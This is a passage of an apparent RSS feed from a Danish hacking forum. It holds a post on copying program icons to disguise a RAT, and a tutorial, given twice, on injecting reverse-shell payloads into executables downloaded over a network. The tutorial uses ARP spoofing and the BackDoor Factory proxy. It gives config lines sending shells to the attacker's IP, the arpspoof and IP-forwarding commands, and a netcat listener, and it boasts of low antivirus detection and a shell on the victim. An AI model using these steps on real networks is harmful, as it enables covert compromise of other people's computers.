<span style="font-style: italic;" class="mycode_i">Desuden er det ikke alle enheder der er lige lette at åbne</span>, og ved mine <span style="font-weight: bold;" class="mycode_b">Sandisk Ultra</span> <span style="font-weight: bold;" class="mycode_b">blev jeg nødt til at skrælle dem godt og grundigt fra deres plastikhylstre:</span></span><br />
<br />
<img src="http://anony.ws/i/2014/10/22/IMAG0907.jpg" alt="[Billede: IMAG0907.jpg]" class="mycode_img" /><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="color: #FF0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">Vær opmærksom på, at deres firmware ikke reagerer på Flash chippen, så med denne firmware virker enheden ikke som USB-stik / Oplagringsenhed mere.</span></span></span><br />
<br />
<br />
Tak til Malcolm for lån af en af hans Youtube brugere. ;)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Sådan får du ikoner til din RAT]]></title>
			<link>https://www.shellsec.pw/traad-saadan-faar-du-ikoner-til-din-rat</link>
			<pubDate>Sat, 11 Oct 2014 13:50:38 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-saadan-faar-du-ikoner-til-din-rat</guid>
			<description><![CDATA[Hej alle sammen.<br />
Jeg sad og legede med lidt RAT og krypteringen af den og ledte så efter et software til at skaffe ikonet af det ikon jeg skal binde min server til. Dette er til dem der vil have et præcist kopi af ikonet :)<br />
<br />
Der kan selvfølgelig findes ikoner på nettet, men det er ikke alle man kan finde!<br />
<br />
Start med at hente: <a href="http://www.nirsoft.net/utils/resources_extract.html" target="_blank" rel="noopener" class="mycode_url">ResourcesExtract v1.18</a><br />
Download findes i bunden af siden til 32 eller 64 bit Windows.<br />
<br />
Udpak filerne og kør programmet. Derefter lav en mappe til dine ikoner.<br />
<br />
Derefter vælg det program hvor ikonet skal udpakkes fra og marker icons og tryk start.<br />
<br />
<img src="http://i.imgur.com/8FTWIcd.png" alt="[Billede: 8FTWIcd.png]" class="mycode_img" /><br />
<br />
Wohla! Nu har du ikonet til din RAT]]></description>
			<content:encoded><![CDATA[Hej alle sammen.<br />
Jeg sad og legede med lidt RAT og krypteringen af den og ledte så efter et software til at skaffe ikonet af det ikon jeg skal binde min server til. Dette er til dem der vil have et præcist kopi af ikonet :)<br />
<br />
Der kan selvfølgelig findes ikoner på nettet, men det er ikke alle man kan finde!<br />
<br />
Start med at hente: <a href="http://www.nirsoft.net/utils/resources_extract.html" target="_blank" rel="noopener" class="mycode_url">ResourcesExtract v1.18</a><br />
Download findes i bunden af siden til 32 eller 64 bit Windows.<br />
<br />
Udpak filerne og kør programmet. Derefter lav en mappe til dine ikoner.<br />
<br />
Derefter vælg det program hvor ikonet skal udpakkes fra og marker icons og tryk start.<br />
<br />
<img src="http://i.imgur.com/8FTWIcd.png" alt="[Billede: 8FTWIcd.png]" class="mycode_img" /><br />
<br />
Wohla! Nu har du ikonet til din RAT]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[PE-Patching over Netværket]]></title>
			<link>https://www.shellsec.pw/traad-pe-patching-over-netvaerket</link>
			<pubDate>Sun, 24 Aug 2014 23:59:45 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-pe-patching-over-netvaerket</guid>
			<description><![CDATA[<span style="font-size: xx-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Introduktion</span></span><br />
I denne korte tutorial vil vi tage et kig på the BackDoor Factory, og dennes tilhørende BDFProxy, som er en modificeret version af MiTMProxy der kører i transparent mode. Det smarte ved BDF’s proxy er, at den kan injicere diverse former for kode direkte ind i et programs code caves ON-THE-FLY når de passerer vores proxy efter et Man-in-The-Middle angreb.<br />
Dette betyder, at når en executable bliver downloaded over det usikre netværk vi har kontrol over, så bliver filen først hentet ned på vores server, BDF injicerer vores payload ind i executable filen og derefter leverer BDFProxy filen til vores offer.<br />
BDF er ikke perfekt. Langt fra. Der er mange sikkerhedsforanstaltninger i forskellige typer software, såsom at tjekke filens MD5 hash, headers, tjekke ændret kode (f. eks. NSIS) osv. <br />
Dette betyder, at utroligt mange filer vil blive beskadiget og ude af stand til at blive kørt. Har dog oplevet at en beskadiget fil stadig kører vores payload selvom hovedinstallationsprogrammet ikke virker.<br />
Desuden kan vi ikke injicere filer der bliver hentet over HTTPS – kun hvis vi har serverens certifikat.  <br />
<br />
-Igen kan en video optages hvis der er brug for det. Men det er en enkel og hurtig process, så burde ikke behøves. ;)<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Krav</span></span><br />
<span style="font-weight: bold;" class="mycode_b">Kali</span> – eller hvilken som helst linux variant du foretrækker<br />
<span style="font-weight: bold;" class="mycode_b">Arpspoof</span><br />
<span style="font-weight: bold;" class="mycode_b">The BackDoor Factory + BDFProxy</span><br />
<span style="font-weight: bold;" class="mycode_b">Netcat</span> – eller Metasploit’s handler<br />
Lidt kendskab til Kali eller Linux generelt (cd, unzip osv. samt hvis du nu støder ind i problemer) <br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 1</span></span><br />
Der er diverse <span style="font-weight: bold;" class="mycode_b">’dependencies’</span> i <span style="text-decoration: underline;" class="mycode_u">BDF</span> der kræver installation før dette framework overhovedet kan køres ordentligt. Det letteste er at installere <span style="font-weight: bold;" class="mycode_b">Veil-Evasion</span>, da dette vil tage hånd om alt det tunge arbejde. <br />
<a href="https://github.com/Veil-Framework/Veil-Evasion/" target="_blank" rel="noopener" class="mycode_url">https://github.com/Veil-Framework/Veil-Evasion/</a><br />
Du kan bruge <span style="font-weight: bold;" class="mycode_b">git clone</span>, eller en hvilet som helst <span style="font-weight: bold;" class="mycode_b">tredjeparts git-klient</span> til at hente filerne ned og installere dem. Jeg trykker bare <span style="font-weight: bold;" class="mycode_b">'Download ZIP'</span> i højre side på <span style="text-decoration: underline;" class="mycode_u">github</span>, så jeg har filerne gemt til hvis jeg nu fucker up og bliver nødt til at gendanne enkelte filer.<br />
<span style="font-weight: bold;" class="mycode_b">ZIP-filen</span> kan vi så udpakke ved at bruge <span style="font-weight: bold;" class="mycode_b">unzip</span> – Eller – bare <span style="text-decoration: underline;" class="mycode_u">dobbeltklikke og trække mappen ud i vores arbejdsmappe</span>.<br />
<span style="font-weight: bold;" class="mycode_b">Veil-Evasion</span> har et <span style="font-weight: bold;" class="mycode_b">shell script</span> der hedder <span style="text-decoration: underline;" class="mycode_u">'setup.sh'</span>. Dette script tager sig af installationen af alle de dependencies jeg nævne før. Hvis jeg husker rigtigt, snakker vi omkring <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">500MB</span></span>, så det er lidt af en omgang.<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2421_15_59.png" alt="[Billede: Screenshotfrom2014-08-2421_15_59.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 2</span></span><br />
Nu skal vi have hentet <span style="font-weight: bold;" class="mycode_b">BDF og BDFProxy</span>. Disse er på samme github account som før, da begge disse er fra manden bag Veil.<br />
<a href="https://github.com/secretsquirrel/the-backdoor-factory" target="_blank" rel="noopener" class="mycode_url">https://github.com/secretsquirrel/the-backdoor-factory</a><br />
<a href="https://github.com/secretsquirrel/BDFProxy" target="_blank" rel="noopener" class="mycode_url">https://github.com/secretsquirrel/BDFProxy</a><br />
Vil ikke gå i dybden med installationen. Da det er samme fremgangsmåde som før:<br />
Det eneste der er værd at nævne her er, at <span style="font-weight: bold;" class="mycode_b">the BackDoor Factory</span> filerne skal placeres i en mappe kaldet <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">’bdf’</span></span> <span style="text-decoration: underline;" class="mycode_u">under samme mappe som du udpakkede <span style="font-weight: bold;" class="mycode_b">BDFProxy</span> filerne</span>. Inde i <span style="font-weight: bold;" class="mycode_b">BDFProxy mappen</span> er der en <span style="font-weight: bold;" class="mycode_b">shell-fil kaldet update.sh</span>, den kan du bruge til at <span style="text-decoration: underline;" class="mycode_u">opdatere senere hen</span>, ved samme fremgangsmåde som da vi installerede <span style="text-decoration: underline;" class="mycode_u">Veil-Evasion</span>.<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 3</span></span><br />
Vi bruger <span style="font-weight: bold;" class="mycode_b">ifconfig</span> igen, til at finde ud af hvilken lokal <span style="font-weight: bold;" class="mycode_b">IP-adresse routeren har givet os</span> <span style="font-style: italic;" class="mycode_i">(Denne skal bruges i trin 4)</span>:<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1901_03_03.png" alt="[Billede: Screenshotfrom2014-08-1901_03_03.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 4</span></span><br />
I <span style="font-weight: bold;" class="mycode_b">BDFProxy mappen[b] finder vi [b]'bdfproxy.cfg'</span>. Denne konfigurationsfil skal vi bruge til at opsætte vores <span style="font-weight: bold;" class="mycode_b">payloads</span>, så de peger på vores <span style="font-weight: bold;" class="mycode_b">egen IP</span> <span style="font-style: italic;" class="mycode_i">(Eller IP’en der har vores listener kørende)</span><br />
<span style="text-decoration: underline;" class="mycode_u">Åbn denne fil med et hvilket som helst redigeringsprogram til tekstfiler </span>– <span style="font-weight: bold;" class="mycode_b">getid, leafpad osv</span>.<br />
<span style="font-weight: bold;" class="mycode_b">Fra linie <span style="text-decoration: underline;" class="mycode_u">100</span></span> og ned finder vi en række <span style="font-weight: bold;" class="mycode_b">instillinger</span> der ser således ud:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>[[[WindowsIntelx64]]]<br />
	PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND<br />
	HOST = 192.168.1.16<br />
	PORT = 8088<br />
	SHELL = reverse_shell_tcp<br />
	SUPPLIED_SHELLCODE = None<br />
	ZERO_CERT = True<br />
	PATCH_DLL = False<br />
	MSFPAYLOAD = windows/x64/shell_reverse_tcp</blockquote>
<span style="font-weight: bold;" class="mycode_b">[[[Styresystem og arkitektur]]]</span><br />
<span style="font-weight: bold;" class="mycode_b">PATCH_TYPE</span> – Hvordan selve injicering skal foretages - Om koden skal indsættes i enkelte code caves, eller om den må splittes imellem flere.<br />
<span style="font-weight: bold;" class="mycode_b">HOST</span> – Det er denne indstilling vi skal have til at pege på IP-adressen vi skal bruge til indgående forbindelser.<br />
<span style="font-weight: bold;" class="mycode_b">PORT</span> – Porten vores payload vil bruge til at forbinde til vores IP.<br />
<span style="font-weight: bold;" class="mycode_b">SHELL</span> – Dette er BDF’s egen syntaks, og angiver vores instillinger.<br />
<span style="font-weight: bold;" class="mycode_b">SUPPLIED_SHELLCODE</span> – Hvis vi har vores egen shell code der skal ’suppleres’ til vores payload. Det er altså ikke en indstilling til udelukkende at bruge egen shell code. Den egenskab finder vi i ’User supplied shellcode’.<br />
<span style="font-weight: bold;" class="mycode_b">ZERO_CERT</span> – Fjerner cerifikatet fra ’underskrevne’ programmer.<br />
<span style="font-weight: bold;" class="mycode_b">PATCH_DLL</span> – Hvorvidt DLL’s skal injiceres.<br />
<span style="font-weight: bold;" class="mycode_b">MSFPAYLOAD</span> – Hvilken payload der skal bruges til dette styresystem og arkitektur.<br />
<br />
Det eneste vi faktisk behøver at ændre, er <span style="font-weight: bold;" class="mycode_b">HOST parametren</span>. Sørg for at <span style="font-weight: bold;" class="mycode_b">PORT parametrene ikke overlapper hinanden</span>. Ellers kan vi lege lidt med payloads og Patch_Types. <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Ret HOST til egen IP alle 4 steder, og gem filen når du er færdig.</span></span><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 5</span></span><br />
Lige som min sidste tutorial, skal vi have aktiveret IP Forwarding<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>echo 1 &gt; /proc/sys/net/ipv4/ip_forward</blockquote>
<br />
Igen sikrer vi os lige at ændringen nu også er godkendt. (<span style="font-weight: bold;" class="mycode_b">OBS:</span> <span style="font-style: italic;" class="mycode_i">Nogle gange er der andre processer der de-aktiverer IP Forwarding, så det er en god idé at cat’e filen hvis dit ARP spoof angreb ikke virker</span>)<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>cat /proc/sys/net/ipv4/ip_forward</blockquote>
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1900_58_52.png" alt="[Billede: Screenshotfrom2014-08-1900_58_52.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 6</span></span><br />
Nu kan vi så køre <span style="font-weight: bold;" class="mycode_b">BDFProxy</span>. <span style="font-weight: bold;" class="mycode_b">I BDFProxy mappen</span> finder vi et <span style="text-decoration: underline;" class="mycode_u">Python script</span> der hedder <span style="font-weight: bold;" class="mycode_b">'bdf_proxy.py'</span>, og dette kan vi så køre fra mappen ved at bruge:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>./bdf_proxy.py</blockquote>
eller:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>python /root/Desktop/bdf/proxy/bdf_proxy.py</blockquote>
<span style="font-weight: bold;" class="mycode_b">/root/Desktop/bdf/proxy/</span> - <span style="font-style: italic;" class="mycode_i">Stien til hvor du udpakkede BDFProxy</span><br />
<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2422_32_48.png" alt="[Billede: Screenshotfrom2014-08-2422_32_48.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 7</span></span><br />
Nu skal vi så have startet vores <span style="font-weight: bold;" class="mycode_b">ARP spoof angreb</span>. <span style="text-decoration: underline;" class="mycode_u">Her behøves Ettercap ikke</span>, da <span style="text-decoration: underline;" class="mycode_u">BDFProxy selv udfører alt arbejdet</span>. I stedet kører vi <span style="font-weight: bold;" class="mycode_b">arpspoof</span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>arpspoof –i wlan0 –t 192.168.0.102 192.168.0.1</blockquote>
<span style="font-weight: bold;" class="mycode_b">-i &lt;Interface&gt;</span> <span style="font-style: italic;" class="mycode_i">wlan0</span> - Det interface vores netværkskort er registreret på. Kan findes ved at bruge <span style="font-weight: bold;" class="mycode_b">'ifconfig'</span>.<br />
<span style="font-weight: bold;" class="mycode_b">-t &lt;Target&gt;</span> <span style="font-style: italic;" class="mycode_i">192.168.0.102</span> - Da dette er en demonstration bruger jeg kun en enkelt IP der skal arp spoofes, <span style="text-decoration: underline;" class="mycode_u">uden –t valgmuligheden vil alle IP’er på netværket få tildelt vores <span style="font-weight: bold;" class="mycode_b">ARP pakker</span>.</span><br />
<span style="font-weight: bold;" class="mycode_b">&lt;Host&gt;</span> <span style="font-style: italic;" class="mycode_i">192.168.0.1</span> – Den vært hvis pakker vi vil opsnappe. Her er det vores <span style="font-weight: bold;" class="mycode_b">router</span>, da den står for pakkeomdelingen.<br />
<img src="http://anony.ws/i/2014/08/25/Screenshotfrom2014-08-2421_54_31.png" alt="[Billede: Screenshotfrom2014-08-2421_54_31.png]" class="mycode_img" /> <br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 8</span></span><br />
Nu starter vi vores <span style="font-weight: bold;" class="mycode_b">listener</span>, så alle indgående forbindelser bliver accepteret af vores computer. Igen vil jeg bruge <span style="font-weight: bold;" class="mycode_b">Netcat</span>, og igen kan andre listeners/handlers bruges.<br />
[/i](Jeg ved mit ofres computer er Windows x64, så jeg ’lytter’ på den port der passer hertil fra bdfproxy.cfg. Hvis dette angreb var tiltænkt hele netværket, ville jeg selvfølgelig ’lytte’ på alle de gældende porte)[/i]<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2422_50_26.png" alt="[Billede: Screenshotfrom2014-08-2422_50_26.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 9</span></span><br />
Når vores offer downloader en executable, vil denne blive injiceret med vores <span style="font-weight: bold;" class="mycode_b">shell code</span>, og derfter leveret til offeret ved hjælp af <span style="font-weight: bold;" class="mycode_b">BDFProxy</span>.<br />
Vil i dette eksempel downloade <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Winrar x64</span></span> over netværket på <span style="font-weight: bold;" class="mycode_b">’offerets’</span> computer.<br />
Når <span style="font-weight: bold;" class="mycode_b">BDFProxy</span> opdager en fil der er ved at blive downloadet, vil det se således ud:<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2423_03_27.png" alt="[Billede: Screenshotfrom2014-08-2423_03_27.png]" class="mycode_img" /><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Og når vores kære offer så åbner filen, vil vores payload blive eksekveret samtidig med installationsfilen.</span></span><br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Offerets PC – Winrar installationsfil:</span></span><br />
<img src="http://anony.ws/i/2014/08/24/rar.png" alt="[Billede: rar.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Netcat – Shell på offeret PC:</span></span><br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2423_04_18.png" alt="[Billede: Screenshotfrom2014-08-2423_04_18.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">BONUS</span></span><br />
Vil fraråde Alle at skanne igennem Virustotal - I ved jo hvorfor - Men ville lige vise jer, hvad Reverse_TCP + Winrar gør for detections:<br />
<br />
<a href="https://www.virustotal.com/en/file/ef6484a77db0dc031101509d8a08aa35176c91b4076a4818df631e5025d00853/analysis/1408917202/" target="_blank" rel="noopener" class="mycode_url">https://www.virustotal.com/en/file/ef648...408917202/</a><br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>SHA256: 	ef6484a77db0dc031101509d8a08aa35176c91b4076a4818df631e5025d00853<br />
File name: 	winrar-x64-511b1.exe<br />
Detection ratio: 	2 / 54<br />
Analysis date: 	2014-08-24 21:53:22 UTC ( 1 minute ago ) </blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b">Det er pænt lækkert, hva?</span><br />
<br />
<span style="text-decoration: underline;" class="mycode_u">Dette kan også opnåes ved hjælp af BDF - Backdoor.py.</span>]]></description>
			<content:encoded><![CDATA[<span style="font-size: xx-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Introduktion</span></span><br />
I denne korte tutorial vil vi tage et kig på the BackDoor Factory, og dennes tilhørende BDFProxy, som er en modificeret version af MiTMProxy der kører i transparent mode. Det smarte ved BDF’s proxy er, at den kan injicere diverse former for kode direkte ind i et programs code caves ON-THE-FLY når de passerer vores proxy efter et Man-in-The-Middle angreb.<br />
Dette betyder, at når en executable bliver downloaded over det usikre netværk vi har kontrol over, så bliver filen først hentet ned på vores server, BDF injicerer vores payload ind i executable filen og derefter leverer BDFProxy filen til vores offer.<br />
BDF er ikke perfekt. Langt fra. Der er mange sikkerhedsforanstaltninger i forskellige typer software, såsom at tjekke filens MD5 hash, headers, tjekke ændret kode (f. eks. NSIS) osv. <br />
Dette betyder, at utroligt mange filer vil blive beskadiget og ude af stand til at blive kørt. Har dog oplevet at en beskadiget fil stadig kører vores payload selvom hovedinstallationsprogrammet ikke virker.<br />
Desuden kan vi ikke injicere filer der bliver hentet over HTTPS – kun hvis vi har serverens certifikat.  <br />
<br />
-Igen kan en video optages hvis der er brug for det. Men det er en enkel og hurtig process, så burde ikke behøves. ;)<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Krav</span></span><br />
<span style="font-weight: bold;" class="mycode_b">Kali</span> – eller hvilken som helst linux variant du foretrækker<br />
<span style="font-weight: bold;" class="mycode_b">Arpspoof</span><br />
<span style="font-weight: bold;" class="mycode_b">The BackDoor Factory + BDFProxy</span><br />
<span style="font-weight: bold;" class="mycode_b">Netcat</span> – eller Metasploit’s handler<br />
Lidt kendskab til Kali eller Linux generelt (cd, unzip osv. samt hvis du nu støder ind i problemer) <br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 1</span></span><br />
Der er diverse <span style="font-weight: bold;" class="mycode_b">’dependencies’</span> i <span style="text-decoration: underline;" class="mycode_u">BDF</span> der kræver installation før dette framework overhovedet kan køres ordentligt. Det letteste er at installere <span style="font-weight: bold;" class="mycode_b">Veil-Evasion</span>, da dette vil tage hånd om alt det tunge arbejde. <br />
<a href="https://github.com/Veil-Framework/Veil-Evasion/" target="_blank" rel="noopener" class="mycode_url">https://github.com/Veil-Framework/Veil-Evasion/</a><br />
Du kan bruge <span style="font-weight: bold;" class="mycode_b">git clone</span>, eller en hvilet som helst <span style="font-weight: bold;" class="mycode_b">tredjeparts git-klient</span> til at hente filerne ned og installere dem. Jeg trykker bare <span style="font-weight: bold;" class="mycode_b">'Download ZIP'</span> i højre side på <span style="text-decoration: underline;" class="mycode_u">github</span>, så jeg har filerne gemt til hvis jeg nu fucker up og bliver nødt til at gendanne enkelte filer.<br />
<span style="font-weight: bold;" class="mycode_b">ZIP-filen</span> kan vi så udpakke ved at bruge <span style="font-weight: bold;" class="mycode_b">unzip</span> – Eller – bare <span style="text-decoration: underline;" class="mycode_u">dobbeltklikke og trække mappen ud i vores arbejdsmappe</span>.<br />
<span style="font-weight: bold;" class="mycode_b">Veil-Evasion</span> har et <span style="font-weight: bold;" class="mycode_b">shell script</span> der hedder <span style="text-decoration: underline;" class="mycode_u">'setup.sh'</span>. Dette script tager sig af installationen af alle de dependencies jeg nævne før. Hvis jeg husker rigtigt, snakker vi omkring <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">500MB</span></span>, så det er lidt af en omgang.<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2421_15_59.png" alt="[Billede: Screenshotfrom2014-08-2421_15_59.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 2</span></span><br />
Nu skal vi have hentet <span style="font-weight: bold;" class="mycode_b">BDF og BDFProxy</span>. Disse er på samme github account som før, da begge disse er fra manden bag Veil.<br />
<a href="https://github.com/secretsquirrel/the-backdoor-factory" target="_blank" rel="noopener" class="mycode_url">https://github.com/secretsquirrel/the-backdoor-factory</a><br />
<a href="https://github.com/secretsquirrel/BDFProxy" target="_blank" rel="noopener" class="mycode_url">https://github.com/secretsquirrel/BDFProxy</a><br />
Vil ikke gå i dybden med installationen. Da det er samme fremgangsmåde som før:<br />
Det eneste der er værd at nævne her er, at <span style="font-weight: bold;" class="mycode_b">the BackDoor Factory</span> filerne skal placeres i en mappe kaldet <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">’bdf’</span></span> <span style="text-decoration: underline;" class="mycode_u">under samme mappe som du udpakkede <span style="font-weight: bold;" class="mycode_b">BDFProxy</span> filerne</span>. Inde i <span style="font-weight: bold;" class="mycode_b">BDFProxy mappen</span> er der en <span style="font-weight: bold;" class="mycode_b">shell-fil kaldet update.sh</span>, den kan du bruge til at <span style="text-decoration: underline;" class="mycode_u">opdatere senere hen</span>, ved samme fremgangsmåde som da vi installerede <span style="text-decoration: underline;" class="mycode_u">Veil-Evasion</span>.<br />
<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 3</span></span><br />
Vi bruger <span style="font-weight: bold;" class="mycode_b">ifconfig</span> igen, til at finde ud af hvilken lokal <span style="font-weight: bold;" class="mycode_b">IP-adresse routeren har givet os</span> <span style="font-style: italic;" class="mycode_i">(Denne skal bruges i trin 4)</span>:<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1901_03_03.png" alt="[Billede: Screenshotfrom2014-08-1901_03_03.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 4</span></span><br />
I <span style="font-weight: bold;" class="mycode_b">BDFProxy mappen[b] finder vi [b]'bdfproxy.cfg'</span>. Denne konfigurationsfil skal vi bruge til at opsætte vores <span style="font-weight: bold;" class="mycode_b">payloads</span>, så de peger på vores <span style="font-weight: bold;" class="mycode_b">egen IP</span> <span style="font-style: italic;" class="mycode_i">(Eller IP’en der har vores listener kørende)</span><br />
<span style="text-decoration: underline;" class="mycode_u">Åbn denne fil med et hvilket som helst redigeringsprogram til tekstfiler </span>– <span style="font-weight: bold;" class="mycode_b">getid, leafpad osv</span>.<br />
<span style="font-weight: bold;" class="mycode_b">Fra linie <span style="text-decoration: underline;" class="mycode_u">100</span></span> og ned finder vi en række <span style="font-weight: bold;" class="mycode_b">instillinger</span> der ser således ud:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>[[[WindowsIntelx64]]]<br />
	PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND<br />
	HOST = 192.168.1.16<br />
	PORT = 8088<br />
	SHELL = reverse_shell_tcp<br />
	SUPPLIED_SHELLCODE = None<br />
	ZERO_CERT = True<br />
	PATCH_DLL = False<br />
	MSFPAYLOAD = windows/x64/shell_reverse_tcp</blockquote>
<span style="font-weight: bold;" class="mycode_b">[[[Styresystem og arkitektur]]]</span><br />
<span style="font-weight: bold;" class="mycode_b">PATCH_TYPE</span> – Hvordan selve injicering skal foretages - Om koden skal indsættes i enkelte code caves, eller om den må splittes imellem flere.<br />
<span style="font-weight: bold;" class="mycode_b">HOST</span> – Det er denne indstilling vi skal have til at pege på IP-adressen vi skal bruge til indgående forbindelser.<br />
<span style="font-weight: bold;" class="mycode_b">PORT</span> – Porten vores payload vil bruge til at forbinde til vores IP.<br />
<span style="font-weight: bold;" class="mycode_b">SHELL</span> – Dette er BDF’s egen syntaks, og angiver vores instillinger.<br />
<span style="font-weight: bold;" class="mycode_b">SUPPLIED_SHELLCODE</span> – Hvis vi har vores egen shell code der skal ’suppleres’ til vores payload. Det er altså ikke en indstilling til udelukkende at bruge egen shell code. Den egenskab finder vi i ’User supplied shellcode’.<br />
<span style="font-weight: bold;" class="mycode_b">ZERO_CERT</span> – Fjerner cerifikatet fra ’underskrevne’ programmer.<br />
<span style="font-weight: bold;" class="mycode_b">PATCH_DLL</span> – Hvorvidt DLL’s skal injiceres.<br />
<span style="font-weight: bold;" class="mycode_b">MSFPAYLOAD</span> – Hvilken payload der skal bruges til dette styresystem og arkitektur.<br />
<br />
Det eneste vi faktisk behøver at ændre, er <span style="font-weight: bold;" class="mycode_b">HOST parametren</span>. Sørg for at <span style="font-weight: bold;" class="mycode_b">PORT parametrene ikke overlapper hinanden</span>. Ellers kan vi lege lidt med payloads og Patch_Types. <span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Ret HOST til egen IP alle 4 steder, og gem filen når du er færdig.</span></span><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 5</span></span><br />
Lige som min sidste tutorial, skal vi have aktiveret IP Forwarding<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>echo 1 &gt; /proc/sys/net/ipv4/ip_forward</blockquote>
<br />
Igen sikrer vi os lige at ændringen nu også er godkendt. (<span style="font-weight: bold;" class="mycode_b">OBS:</span> <span style="font-style: italic;" class="mycode_i">Nogle gange er der andre processer der de-aktiverer IP Forwarding, så det er en god idé at cat’e filen hvis dit ARP spoof angreb ikke virker</span>)<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>cat /proc/sys/net/ipv4/ip_forward</blockquote>
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1900_58_52.png" alt="[Billede: Screenshotfrom2014-08-1900_58_52.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 6</span></span><br />
Nu kan vi så køre <span style="font-weight: bold;" class="mycode_b">BDFProxy</span>. <span style="font-weight: bold;" class="mycode_b">I BDFProxy mappen</span> finder vi et <span style="text-decoration: underline;" class="mycode_u">Python script</span> der hedder <span style="font-weight: bold;" class="mycode_b">'bdf_proxy.py'</span>, og dette kan vi så køre fra mappen ved at bruge:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>./bdf_proxy.py</blockquote>
eller:<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>python /root/Desktop/bdf/proxy/bdf_proxy.py</blockquote>
<span style="font-weight: bold;" class="mycode_b">/root/Desktop/bdf/proxy/</span> - <span style="font-style: italic;" class="mycode_i">Stien til hvor du udpakkede BDFProxy</span><br />
<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-2422_32_48.png" alt="[Billede: Screenshotfrom2014-08-2422_32_48.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 7</span></span><br />
Nu skal vi så have startet vores <span style="font-weight: bold;" class="mycode_b">ARP spoof angreb</span>. <span style="text-decoration: underline;" class="mycode_u">Her behøves Ettercap ikke</span>, da <span style="text-decoration: underline;" class="mycode_u">BDFProxy selv udfører alt arbejdet</span>. I stedet kører vi <span style="font-weight: bold;" class="mycode_b">arpspoof</span>:<br />
